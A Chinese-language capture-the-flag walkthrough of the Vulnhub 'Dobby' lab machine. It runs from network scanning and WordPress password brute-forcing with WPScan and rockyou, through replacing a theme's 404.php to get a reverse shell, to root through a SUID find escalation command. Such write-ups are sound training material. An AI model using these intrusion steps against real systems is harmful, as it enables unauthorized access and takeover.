Vulnhub之Dobby详细解题过程(不同的获得wordpress后台密码方法)
Dobby
作者:jason_huawen
靶机信息
名称:Hogwarts: Dobby
地址:
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:9f:49:9e 1 60 PCS Systemtechnik GmbH
192.168.56.207 08:00:27:a4:96:64 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.207
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.207 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-15 06:21 EST
Nmap scan report for 192.168.56.207
Host is up (0.00015s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
|_http-title: Draco:dG9vIGVhc3kgbm8/IFBvdHRlcg==
|_http-server-header: Apache/2.4.46 (Ubuntu)
MAC Address: 08:00:27:A4:96:64 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.37 seconds
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ echo 'dG9vIGVhc3kgbm8/IFBvdHRlcg==' | base64 -d
too easy no? Potter
Potter是用户名吗?
获得Shell
访问80端口,返回页面源代码中有注释:
<!--
See: /alohomora
-->
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ curl http://192.168.56.207/alohomora/
Draco's password is his house ;)
Draco是用户名?密码是他的房子?
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ nikto -h http://192.168.56.207
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.207
+ Target Hostname: 192.168.56.207
+ Target Port: 80
+ Start Time: 2023-01-15 06:25:39 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.46 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2ae1, size: 5b3957e06e486, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2023-01-15 06:26:31 (GMT-5) (52 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.46) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)? n
──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ gobuster dir -u http://192.168.56.207 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.207
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/01/15 06:27:12 Starting gobuster in directory enumeration mode
===============================================================
/log (Status: 200) [Size: 45]
/server-status (Status: 403) [Size: 279]
Progress: 218329 / 220561 (98.99%)===============================================================
2023/01/15 06:27:38 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ curl http://192.168.56.207/log
pass:OjppbGlrZXNvY2tz
hint --> /DiagonAlley
/DiagonAlley为wordpress站点。
有个post,是brainfuck编码,
+++++ +++++ [->++ +++++ +++<] >.<++ +[->+ ++<]> ++.<+ ++[-> —<] >—-
..<++ ++[-> ++++< ]>+++ ++++. <++++ [->– –<]> .<+++ [->++ +<]>+ .<+++ +[->- —<] >–.< ++++[ ->+++ +<]>+ +++.- -.<++ +[->- –<]> —– .<+++ [->++ +<]>+ +++.<
解码以后:
donn��������
上面的密码是什么用户名的密码呢
用draco以及上面的密码登录wordpress后台,并不能成功登录,奇怪!!!
┌──(kali㉿kali)-[~]
└─$ echo 'OjppbGlrZXNvY2tz' | base64 -d
::ilikesocks
其实作者给出的密码是base64编码过的。
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ wpscan --url http://192.168.56.207/DiagonAlley/ -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.207/DiagonAlley/ [192.168.56.207]
[+] Started: Sun Jan 15 06:37:04 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.46 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.207/DiagonAlley/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.207/DiagonAlley/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.207/DiagonAlley/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.207/DiagonAlley/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.5.3 identified (Insecure, released on 2020-10-30).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.207/DiagonAlley/index.php/feed/, <generator>https://wordpress.org/?v=5.5.3</generator>
| - http://192.168.56.207/DiagonAlley/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.3</generator>
[+] WordPress theme in use: amphibious
| Location: http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/
| Latest Version: 1.0.1 (up to date)
| Last Updated: 2020-04-15T00:00:00.000Z
| Readme: http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/readme.txt
| Style URL: http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/style.css?ver=5.5.3
| Style Name: Amphibious
| Style URI: https://templatepocket.com/free-wordpress-theme/amphibious-responsive-blog-wordpress-theme/
| Description: Amphibious is an elegant magazine, personal, blog WordPress theme. Amphibious has a clean, modern an...
| Author: TemplatePocket
| Author URI: https://templatepocket.com
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/style.css?ver=5.5.3, Match: 'Version: 1.0.1'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] draco
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://192.168.56.207/DiagonAlley/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
[+] Draco
| Found By: Rss Generator (Passive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Jan 15 06:37:07 2023
[+] Requests Done: 54
[+] Cached Requests: 6
[+] Data Sent: 15.186 KB
[+] Data Received: 303.258 KB
[+] Memory used: 233.68 MB
[+] Elapsed time: 00:00:03
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ wpscan --url http://192.168.56.207/DiagonAlley/ -U draco -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.207/DiagonAlley/ [192.168.56.207]
[+] Started: Sun Jan 15 06:40:08 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.46 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.207/DiagonAlley/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.207/DiagonAlley/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.207/DiagonAlley/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.207/DiagonAlley/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.5.3 identified (Insecure, released on 2020-10-30).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.207/DiagonAlley/index.php/feed/, <generator>https://wordpress.org/?v=5.5.3</generator>
| - http://192.168.56.207/DiagonAlley/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.3</generator>
[+] WordPress theme in use: amphibious
| Location: http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/
| Latest Version: 1.0.1 (up to date)
| Last Updated: 2020-04-15T00:00:00.000Z
| Readme: http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/readme.txt
| Style URL: http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/style.css?ver=5.5.3
| Style Name: Amphibious
| Style URI: https://templatepocket.com/free-wordpress-theme/amphibious-responsive-blog-wordpress-theme/
| Description: Amphibious is an elegant magazine, personal, blog WordPress theme. Amphibious has a clean, modern an...
| Author: TemplatePocket
| Author URI: https://templatepocket.com
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/style.css?ver=5.5.3, Match: 'Version: 1.0.1'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==============================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - draco / slytherin
Trying draco / slytherin Time: 00:04:10 < > (14930 / 14359322) 0.10% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: draco, Password: slytherin
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Jan 15 06:44:24 2023
[+] Requests Done: 15070
[+] Cached Requests: 37
[+] Data Sent: 8.042 MB
[+] Data Received: 8.99 MB
[+] Memory used: 292.348 MB
[+] Elapsed time: 00:04:15
成功破解出了draco的密码:slytherin
接下来登录wordpress管理后台,在appearance ->Editor中修改404.php,替换为shell.php代码。
而404.php的位置可以通过查看wordpress站点首页页面源代码:
http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/404.php
在Kali Linux上成功得到目标主机反弹回来的shell
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.207] 34256
Linux HogWarts 5.8.0-26-generic #27-Ubuntu SMP Wed Oct 21 22:29:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
13:37:52 up 1:18, 0 users, load average: 0.03, 0.05, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
www-data@HogWarts:/home/dobby$ ls -alh
ls -alh
total 92K
drwxr-xr-x 16 dobby dobby 4.0K Nov 7 2020 .
drwxr-xr-x 3 root root 4.0K Nov 7 2020 ..
-rw------- 1 dobby dobby 1.9K Nov 8 2020 .bash_history
-rw-r--r-- 1 dobby dobby 220 Nov 7 2020 .bash_logout
-rw-r--r-- 1 dobby dobby 3.7K Nov 7 2020 .bashrc
drwx------ 15 dobby dobby 4.0K Nov 7 2020 .cache
drwxr-xr-x 12 dobby dobby 4.0K Nov 7 2020 .config
drwx------ 3 dobby dobby 4.0K Nov 8 2020 .gnupg
drwxr-xr-x 3 dobby dobby 4.0K Nov 7 2020 .local
drwx------ 5 dobby dobby 4.0K Nov 7 2020 .mozilla
-rw------- 1 dobby dobby 313 Nov 7 2020 .mysql_history
-rw-r--r-- 1 dobby dobby 807 Nov 7 2020 .profile
drwx------ 2 dobby dobby 4.0K Nov 7 2020 .ssh
-rw-r--r-- 1 dobby dobby 0 Nov 7 2020 .sudo_as_admin_successful
drwxr-xr-x 3 dobby dobby 4.0K Nov 8 2020 Descargas
drwxr-xr-x 2 dobby dobby 4.0K Nov 7 2020 Documentos
drwxr-xr-x 2 dobby dobby 4.0K Nov 8 2020 Escritorio
drwxr-xr-x 2 dobby dobby 4.0K Nov 7 2020 Imágenes
drwxr-xr-x 2 dobby dobby 4.0K Nov 7 2020 Música
drwxr-xr-x 2 dobby dobby 4.0K Nov 7 2020 Plantillas
drwxr-xr-x 2 dobby dobby 4.0K Nov 7 2020 Público
drwxr-xr-x 2 dobby dobby 4.0K Nov 7 2020 Vídeos
-rw-rw-r-- 1 dobby dobby 106 Nov 7 2020 flag1.txt
-r--r----- 1 root root 755 Nov 7 2020 sudoers
www-data@HogWarts:/home/dobby$ cat flag1.txt
cat flag1.txt
Command 'cat' not found, but can be installed with:
apt install coreutils
Please ask your administrator.
www-data@HogWarts:/home/dobby$ more flag1.txt
more flag1.txt
"Harry potter this year should not go to the school of wizardry"
flag1{28327a4964cb391d74111a185a5047ad}
虽然目标主机上没有cat命令,但可以使用more命令得到第1个flag
提权
将linpeas.sh脚本上传之目标主机/tmp目录,修改权限,并执行脚本,输出结果中以下部分:
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strings Not Found
-rwsr-xr-x 1 root root 109K Oct 8 2020 /snap/snapd/9721/usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 43K Mar 5 2020 /snap/core18/1885/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 63K Jun 28 2019 /snap/core18/1885/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/1885/bin/su
-rwsr-xr-x 1 root root 27K Mar 5 2020 /snap/core18/1885/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/1885/usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/1885/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/1885/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22 2019 /snap/core18/1885/usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 59K Mar 22 2019 /snap/core18/1885/usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 146K Jan 31 2020 /snap/core18/1885/usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-- 1 root systemd-network 42K Jun 11 2020 /snap/core18/1885/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Mar 4 2019 /snap/core18/1885/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43K Sep 16 2020 /snap/core18/1932/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 63K Jun 28 2019 /snap/core18/1932/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/1932/bin/su
-rwsr-xr-x 1 root root 27K Sep 16 2020 /snap/core18/1932/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/1932/usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/1932/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/1932/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22 2019 /snap/core18/1932/usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 59K Mar 22 2019 /snap/core18/1932/usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 146K Jan 31 2020 /snap/core18/1932/usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-- 1 root systemd-network 42K Jun 11 2020 /snap/core18/1932/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Mar 4 2019 /snap/core18/1932/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 23K Aug 3 2020 /usr/libexec/polkit-agent-helper-1
-rwsr-xr-- 1 root sssd 92K Oct 6 2020 /usr/libexec/sssd/ldap_child (Unknown SUID binary)
-rwsr-xr-- 1 root sssd 83K Oct 6 2020 /usr/libexec/sssd/p11_child (Unknown SUID binary)
-rwsr-xr-- 1 root sssd 168K Oct 6 2020 /usr/libexec/sssd/krb5_child (Unknown SUID binary)
-rwsr-xr-- 1 root sssd 31K Oct 6 2020 /usr/libexec/sssd/proxy_child (Unknown SUID binary)
-rwsr-xr-- 1 root sssd 56K Oct 6 2020 /usr/libexec/sssd/selinux_child (Unknown SUID binary)
-rwsr-xr-- 1 root dip 386K Jul 23 2020 /usr/sbin/pppd ---> Apple_Mac_OSX_10.4.8(05-2007)
-rwsr-xr-x 1 root root 15K Sep 29 2020 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 71K Aug 30 2020 /usr/bin/su
-rwsr-xr-x 1 root root 67K May 28 2020 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 179K Jul 8 2020 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 84K May 28 2020 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 47K Jul 24 2020 /usr/bin/base32
-rwsr-xr-x 1 root root 87K May 28 2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 313K Sep 30 2020 /usr/bin/find
-rwsr-xr-x 1 root root 31K Aug 3 2020 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 52K May 28 2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 55K Aug 30 2020 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 39K Aug 30 2020 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 44K May 28 2020 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 467K Jun 7 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 131K Oct 19 2020 /usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-- 1 root messagebus 51K Sep 10 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root root 15K Oct 7 2020 /usr/lib/xorg/Xorg.wrap
可以利用find或者base32命令的SUID位进行提权
www-data@HogWarts:/tmp$ /usr/bin/find . -exec /bin/sh -p \; -quit
/usr/bin/find . -exec /bin/sh -p \; -quit
# cd /root
cd /root
# ls -alh
ls -alh
total 32K
drwx------ 4 root root 4.0K Nov 7 2020 .
drwxr-xr-x 20 root root 4.0K Nov 7 2020 ..
-rw------- 1 root root 162 Nov 7 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Aug 14 2019 .bashrc
drwx------ 2 root root 4.0K Oct 22 2020 .cache
drwxr-xr-x 3 root root 4.0K Nov 7 2020 .local
-rw-r--r-- 1 root root 161 Sep 16 2020 .profile
-rw-r--r-- 1 root root 1.4K Nov 7 2020 proof.txt
# cat proof.txt
cat proof.txt
/bin/sh: 3: cat: not found
# more proof.txt
more proof.txt
_ __
___ | ' \
___ \ / ___ ,'\_ | .-. \ /|
\ / | |,'__ \ ,'\_ | \ | | | | ,' |_ /|
_ | | | |\/ \ \ | \ | |\_| _ | |_| | _ '-. .-',' |_ _
// | | | |____| | | |\_|| |__ // | | ,'_`. | | '-. .-',' `. ,'\_
\\_| |_,' .-, _ | | | | |\ \ // .| |\_/ | / \ || | | | / |\ \| \
`-. .-'| |/ / | | | | | | \ \// | | | | | || | | | | |_\ || |\_|
| | | || \_| | | | /_\ \ / | |` | | | || | | | | .---'| |
| | | |\___,_\ /_\ _ // | | | \_/ || | | | | | /\| |
/_\ | | //_____// .||` `._,' | | | | \ `-' /| |
/_\ `------' \ | AND `.\ | | `._,' /_\
\| THE `.\
_ _ _ _ __ _ __ _ /_
(_`/ \|_)/ '|_ |_)|_ |_)(_
._)\_/| \\_,|__| \|__| \ _)
_ ___ _ _
(_` | / \|\ ||__
._) | \_/| \||___
root{63a9f0ea7bb98050796b649e85481845!!}
#
成功实现提权,并拿到root flag
STRIVE FOR PROGRESS,NOT FOR PERFECTION